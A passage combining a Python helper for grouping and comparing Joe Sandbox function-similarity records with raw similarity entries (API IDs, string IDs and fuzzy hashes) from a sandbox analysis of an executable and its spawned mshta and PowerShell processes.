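            records.append(current)
            continue
        match = FIELD_RE.match(line)
        if match and current is not None:
            current[match.group(1).strip()] = match.group(2).strip()
    return records


def split_api_string_id(record: Dict[str, str]) -> Tuple[str, str]:
    """API String ID is two dash-separated numbers. In the listing the first
    tracks the API ID field and the second the String ID field (0 when the
    function references no strings)."""
    api_part, _, string_part = record["API String ID"].partition("-")
    return api_part, string_part


def hamming_distance(a: str, b: str) -> int:
    """Count differing positions. Assumption: a positional comparison is a
    usable first-pass triage; it is not Joe Sandbox's own similarity metric.
    Unequal lengths are rejected rather than guessed at."""
    if len(a) != len(b):
        raise ValueError("positional comparison requires equal-length hashes")
    return sum(x != y for x, y in zip(a, b))


def group_by_api_hash(records: List[Dict[str, str]]) -> Dict[str, List[Dict[str, str]]]:
    """Bucket functions that share the API-name component of API String ID."""
    groups: Dict[str, List[Dict[str, str]]] = {}
    for rec in records:
        api_hash, _ = split_api_string_id(rec)
        groups.setdefault(api_hash, []).append(rec)
    return groups


def near_duplicates(records: List[Dict[str, str]], max_distance: int = 8) -> List[Tuple[int, int, int]]:
    """Return (i, j, distance) for pairs whose Instruction Fuzzy Hashes differ
    in at most max_distance positions (threshold is an assumption)."""
    hits: List[Tuple[int, int, int]] = []
    for i in range(len(records)):
        for j in range(i + 1, len(records)):
            a = records[i]["Instruction Fuzzy Hash"]
            b = records[j]["Instruction Fuzzy Hash"]
            if len(a) == len(b):
                d = hamming_distance(a, b)
                if d <= max_distance:
                    hits.append((i, j, d))
    return hits


if __name__ == "__main__":
    recs = parse_similarity_records(SAMPLE_RECORDS)
    for api_hash, members in group_by_api_hash(recs).items():
        print(api_hash, [m["String ID"] or "<no strings>" for m in members])
    for i, j, d in near_duplicates(recs):
        print(f"records {i} and {j}: {d} differing hex digits; "
              f"same API ID {recs[i]['API ID']!r}, String IDs differ")
```

Run against a full report export, the same parser lets you collapse the hundreds of per-function records into API-hash buckets first and only then look at fuzzy-hash distances inside each bucket, which keeps the pairwise comparison cheap and avoids matching unrelated functions that happen to share a hash prefix.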
APIs
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
                                                                                                                                                                                                                                                            • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                                                            • Instruction ID: 4e1a192d0076a52cf4575ebaa225ae3dffb7ad558b6d2708bffdfd4671950fe0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F11A531E1C16292FA58FB6AE6842BD1292EF89B90F948031DB5987FDACD3DD5C18740
APIs
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
• Instruction ID: d03305e209f12da7931db38f9328676fcaee51668232bcff120ac439f25be5d2
• Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
• Instruction Fuzzy Hash: 39114826B18B169AEB00EF60E9442AC33A4FB59758F040E31DE2D86BA4DF78D1988340
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
• Opcode ID: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
• Instruction ID: 7d97436e2cdf763460f67447f8a9ec2903ea4407e4eaf198c9c52247051e6810
• Opcode Fuzzy Hash: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
• Instruction Fuzzy Hash: 3A413E62A0C3A265F728BB25D60137E5755EF827A8F104235EE6C86BD6DF3CD441CB00
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF6404F835E
  • Part of subcall function 00007FF6404F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
  • Part of subcall function 00007FF6404F9C58: GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6404EBEC5), ref: 00007FF6404F837C
Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\rename_me_before.exe
• API String ID: 3580290477-100362983
• Opcode ID: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
• Instruction ID: 0d5b3cdb9dd6dd4a0d6acaf5750bde0d4d7acd2cc4dcc607e8aefcf81ecb72f2
• Opcode Fuzzy Hash: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
• Instruction Fuzzy Hash: 51418132A0CB62E5E718FF25A5810BC379AEF457A4B554039EE5D87B95DE3CE4818700
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: CurrentDirectory_invalid_parameter_noinfo
• String ID: .$:
• API String ID: 2020911589-4202072812
• Opcode ID: 877ab66861cd581cb00139adc1238e41cebb29b8ab944fd3dc74440885d04d70
• Instruction ID: dcd28da8715499e852ed36772311ef6bc3a9062e7d6a0b07aae994aa9edb250e
• Opcode Fuzzy Hash: 877ab66861cd581cb00139adc1238e41cebb29b8ab944fd3dc74440885d04d70
• Instruction Fuzzy Hash: 84417E62F0C762E9FB10FBB198506FC26BAAF54758F540035DE4DA7B89DF78A4429320
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711
Memory Dump Source
• Source File: 00000011.00000003.1747910857.000001C8D01E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001C8D01E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_3_1c8d01e0000_mshta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000045.00000002.1849742865.00007FFD99E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_7ffd99e20000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000045.00000002.1849365710.00007FFD99D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_7ffd99d50000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000045.00000002.1849365710.00007FFD99D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99D50000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_69_2_7ffd99d50000_powershell.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                            • Instruction ID: b13a88b549bebaafe024d3b201b8d4f4eeb421777b31f8c969d1f3422b1165e9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B01A77020CB0C8FD744EF0CE451AA5B3E0FF85324F50052DE58AC3695D632E881CB42